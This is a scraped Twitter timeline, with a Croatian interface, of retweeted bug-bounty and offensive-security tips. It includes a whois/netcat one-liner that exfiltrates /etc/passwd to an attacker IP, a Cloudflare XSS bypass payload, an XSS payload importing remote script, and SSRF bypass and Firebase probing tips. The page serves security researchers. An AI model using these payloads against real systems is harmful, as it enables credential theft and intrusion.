Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
Blokirali ste korisnika/cu @0x740i
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0x740i
-
740i proslijedio/la je Tweet
When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past.
#bugbountytip#bugbountytip#bugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
I was tired of outdated XSS cheat sheets that don't touch on frameworks, html5, filter bypasses and other important stuff, so I made my own. I hope you find it as useful as I do. :) https://netsec.expert/2020/02/01/xss-in-2020.html …
#bugbountytipspic.twitter.com/Mdygq1PI9Z
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Good news — since China stole the IP of F-35 for their J-31 it means their software is crap too. NSA can just patch diff between the current builds and the stolen builds and they’ll have hundreds of 1day exploits! China’s industrial espionage is a vulnerability!!
https://twitter.com/bentaub91/status/1222892098891980800 …Tweet je nedostupan.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
oneliner to retrieve ASN numbers of a company.
#bugbountytips (ls /tmp/GeoLite2-ASN-CSV.zip||wget --quiet -P /tmp "https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN-CSV.zip …") 2>&1|grep X; unzip -c /tmp/GeoLite2-ASN-CSV.zip|grep -i airbnb|cut -d ',' -f 2|sort -fu https://pastebin.com/G44mnY2x pic.twitter.com/VjesAUOVLN
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search > Regex \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w]) Suggestions are welcome.pic.twitter.com/E0nEDFeUaM
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Great details and Payloads on SSRF ...DO check it out once.. “SSRF payloads” by Pravinrphttps://link.medium.com/mi118T9LW1
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
#bugbountytip decompile android app. and go to : Resources > resources.arsc > res > values > strings.xml search for *.firebaseio.com in xml file. ,and open browser try https://*.firebaseio.com/.json , you might find read access to database there.#bugbountytips .pic.twitter.com/eZPSqnAbWV
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Cloudflare XSS Bypass Payload <svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare#bugbounty#bugbountytips#WAF#XssPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Have limited ways to exfiltrate data? Use Whois! attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
No telnet or netcat/nc? Use curl with telnet://host:port :)pic.twitter.com/b3lMJy2aee
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
We've published new HTTP desync techniques, tooling and patches in HTTP Desync Attacks: what happened next, by
@albinowaxhttps://portswigger.net/research/http-desync-attacks-what-happened-next …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
740i proslijedio/la je Tweet
As promised, posting the next lazy write-up, this is how I went from Git to RCE. Bounty: $3500
#bug#bughunter#bugbounty#bounty If you enjoy these and want to see more, I will be posting others soon again.pic.twitter.com/4rVnvSfjKw
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
New post. Coding a powershell bind shell that bypass that troublesome Windows Firewall pop-up when binding tcp sockets! No need for Local admin either.https://0x00-0x00.github.io/research/2019/09/13/UserLevel-BindShell-Bypassing-HostFirewall-Restrictions.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
HTTP Desync Attacks is now out on YouTube, courtesy of
@Ministraitor and@BSidesMCRhttps://www.youtube.com/watch?v=-y82LadA7N4 …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Valve banned me on their H1 program. So... I release new
#ZeroDay#PublicDisclosure EoP vulnerability at Steam. Another#0day. Rus - https://habr.com/ru/company/pm/blog/464367/ … Eng - https://amonitoring.ru/article/onemore_steam_eop_0day/ …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Return a list of endpoints from a swagger.json. Pass them to your fuzzer(s), +profit? curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'
#bugbounty#bugbountytips#redteam#security#oneliner#bashpic.twitter.com/8gCAMl9uY8
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
Load external javascript in script: import('url') For example: <img src onerror=import('//bo0om.ru/x/')> Works in Chrome
#XSS#javascriptHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
The history of “news” is fascinating. Very tightly coupled with the history of propaganda, rumor and credibility. Early on people judged the credibility of news based on the person who delivered it. They didn’t like words on paper because they couldn’t determine credibility.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
740i proslijedio/la je Tweet
I wrote up a POC, WindfarmDynamite, to educate myself on process injection using WNF. This work is based on the great research by
@aionescu /@pwissenlit and the awesome work by modexp

. For further details check out the GitHub page => https://github.com/FuzzySecurity/Sharp-Suite …pic.twitter.com/WJaQFfl6Mu
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.